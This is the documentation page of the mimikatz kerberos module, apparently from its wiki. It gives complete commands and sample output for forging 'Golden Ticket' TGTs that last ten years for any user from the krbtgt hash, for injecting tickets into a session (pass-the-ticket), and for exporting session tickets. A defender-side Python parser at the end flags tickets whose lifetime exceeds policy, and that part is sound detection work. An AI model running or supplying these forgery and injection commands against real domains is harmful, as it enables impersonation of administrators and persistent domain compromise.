module ~ kerberos
This module can be used without any privilege. It lets you play with the official Microsoft Kerberos API (http://msdn.microsoft.com/library/windows/desktop/aa378099.aspx) and create offline 'Golden tickets': free, long-duration TGTs for any user 😄
Lots of information: [fr] http://1drv.ms/1fuEU28
Willy Wonka's choice
This command creates a long-duration Kerberos ticket, a TGT valid for 10 years, for any user you want (e.g. the domain administrator 😤).
Arguments:
- `/user` - the username you want to impersonate; keep in mind that Administrator is not the only name for this well-known account.
- `/domain` - the fully qualified domain name (e.g. `chocolate.local`).
- `/sid` - the SID of the domain (e.g. `S-1-5-21-130452501-2365100805-3685010670`).
- `/krbtgt` - the NTLM hash of the `krbtgt` account (from `NTDS.DIT` or `lsadump::samrpc /patch`).
- `/id` - optional - the id of the user - default is `500` for the well-known Administrator.
- `/groups` - optional - ids of the groups the user belongs to (the first is the primary group, comma separated) - default is `513,512,520,518,519` for the well-known Administrator's groups.
- `/ticket` - optional - filename to write the ticket to - default is `ticket.kirbi`.
```
mimikatz # kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
User      : utilisateur
Domain    : chocolate.local
SID       : S-1-5-21-130452501-2365100805-3685010670
User Id   : 1107
Groups Id : *513
krbtgt    : 310b643c5316c8c3c70a10cfb17e2e31
-> Ticket : utilisateur.chocolate.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !
```
Remarks:
- password changing/smartcard usage does not invalidate a Golden Ticket;
- this ticket is not issued by the real KDC, so the encryption types the KDC allows do not apply to it;
- the NTLM hash of the `krbtgt` account is never changed automatically.
See also:
- Pass-The-Hash: sekurlsa::pth
- [fr] http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos
- [pl] http://zine.net.pl/blogs/mgrzeg/archive/2014/01/20/kerberos-a-lsass.aspx
- [en] http://rycon.hu/papers/goldenticket.html
Pass-The-Ticket
Injects a Kerberos ticket into the current session (TGT or TGS).
Argument:
- `filename` - the ticket's filename
```
mimikatz # kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi
Ticket 'Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi' successfully submitted for current session
```
Remark: if used with tickets external to mimikatz, the tickets must be in Kerberos credential format (`KRB_CRED`) - http://tools.ietf.org/html/rfc4120#section-5.8
See also:
- Pass-The-Hash: sekurlsa::pth
- [fr] http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
- [pl] http://zine.net.pl/blogs/mgrzeg/archive/2014/01/20/kerberos-a-lsass.aspx
- [en] http://rycon.hu/papers/goldenticket.html
Displays information about the TGT of the current session.
```
mimikatz # kerberos::tgt
Keberos TGT of current session :
           Start/End/MaxRenew: 24/04/2014 14:54:56 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56
           Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL
           Target Name  (--) : @ CHOCOLATE.LOCAL
           Client Name  (01) : Administrateur ; @ CHOCOLATE.LOCAL
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
           Ticket (00 - 12)  : [...]

        (NULL session key means allowtgtsessionkey is not set to 1)
```
Remark: if the session key is filled with `00`, then `allowtgtsessionkey` is not enabled (http://support.microsoft.com/kb/308339) and the session key of the TGT will not be exported by `kerberos::list /export` unless you set it; this is not a problem for TGS tickets. `sekurlsa::tickets /export` works without this key because it reads raw memory.
Lists and exports Kerberos tickets (TGT and TGS) of the current session.
Argument:
- `/export` - optional - export all tickets to files
```
mimikatz # kerberos::list /export

[00000000] - 12
   Start/End/MaxRenew: 24/04/2014 14:54:56 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56
   Server Name       : krbtgt/CHOCOLATE.LOCAL @ CHOCOLATE.LOCAL
   Client Name       : Administrateur @ CHOCOLATE.LOCAL
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
   * Saved to file   : 0-40e10000-Administrateur@krbtgt~CHOCOLATE.LOCAL-CHOCOLATE.LOCAL.kirbi

[00000001] - 12
   Start/End/MaxRenew: 24/04/2014 15:13:03 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56
   Server Name       : cifs/srvcharly.chocolate.local @ CHOCOLATE.LOCAL
   Client Name       : Administrateur @ CHOCOLATE.LOCAL
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file   : 1-40a50000-Administrateur@cifs~srvcharly.chocolate.local-CHOCOLATE.LOCAL.kirbi
```
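As an added defender-side example (not mimikatz code), the Python below parses `kerberos::list` output in the format shown above, decodes the `Flags` word using the RFC 4120 ticket-flag bit positions, and reports tickets whose lifetime exceeds the domain policy: a `kerberos::golden` TGT valid for 10 years stands out against the 10-hour TGT the real KDC issues. The sample input is the TGT from the listing above plus a constructed 10-year ticket, and the 10 hour / 7 day limits are assumed Windows defaults.

```python
from datetime import datetime, timedelta

# Ticket flag names by bit (RFC 4120 s.5.4.1, bit 0 = MSB); mimikatz shows bit 15 as name_canonicalize.
FLAG_NAMES = ("reserved", "forwardable", "forwarded", "proxiable", "proxy",
              "may_postdate", "postdated", "invalid", "renewable", "initial",
              "pre_authent", "hw_authent", "transited_policy_checked",
              "ok_as_delegate", "anonymous", "name_canonicalize")
TIME_FMT = "%d/%m/%Y %H:%M:%S"
# Assumed policy: Windows defaults (10 h ticket, 7 day renewal); use the audited domain's real values.
MAX_TICKET_LIFE, MAX_RENEW_LIFE = timedelta(hours=10), timedelta(days=7)

# Constructed sample: the TGT from the listing above plus a forged 10-year TGT in the same format.
SAMPLE = """[00000000] - 12
Start/End/MaxRenew: 24/04/2014 14:54:56 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56
Server Name : krbtgt/CHOCOLATE.LOCAL @ CHOCOLATE.LOCAL
Client Name : Administrateur @ CHOCOLATE.LOCAL
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
[00000001] - 23
Start/End/MaxRenew: 24/04/2014 15:20:00 ; 22/04/2024 15:20:00 ; 22/04/2024 15:20:00
Server Name : krbtgt/CHOCOLATE.LOCAL @ CHOCOLATE.LOCAL
Client Name : utilisateur @ CHOCOLATE.LOCAL
Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;
"""

def decode_flags(hex_word):
    """Set of flag names present in a hex flag word such as 40e10000."""
    value = int(hex_word, 16)
    return {n for bit, n in enumerate(FLAG_NAMES) if bit and value >> (31 - bit) & 1}

def parse_list_output(text):
    """Parse 'kerberos::list' output into one dict per ticket (a [index] - etype line starts a ticket)."""
    tickets = []
    for line in (ln.strip() for ln in text.splitlines()):
        if line.startswith("[") and "] - " in line:
            tickets.append({})
        elif line.startswith("Start/End/MaxRenew:"):
            stamps = line.split(":", 1)[1].split(";")
            tickets[-1]["start"], tickets[-1]["end"], tickets[-1]["renew"] = [
                datetime.strptime(s.strip(), TIME_FMT) for s in stamps]
        elif line.startswith(("Server Name", "Client Name")):
            tickets[-1][line.split()[0].lower()] = line.split(":", 1)[1].strip()
        elif line.startswith("Flags "):
            tickets[-1]["flags"] = decode_flags(line.split()[1])
    return tickets

def suspicious_tickets(tickets):
    """Tickets outliving the policy limits: a forged 10-year TGT trips this, a KDC-issued one does not."""
    return [(t["client"], t["server"], t["end"] - t["start"]) for t in tickets
            if t["end"] - t["start"] > MAX_TICKET_LIFE
            or t["renew"] - t["start"] > MAX_RENEW_LIFE]
```

Run `suspicious_tickets(parse_list_output(SAMPLE))` to get the offending (client, server, lifetime) tuples; the real listing's `* Saved to file` lines are simply ignored by the parser.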
Purges all tickets of the current session.
```
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
```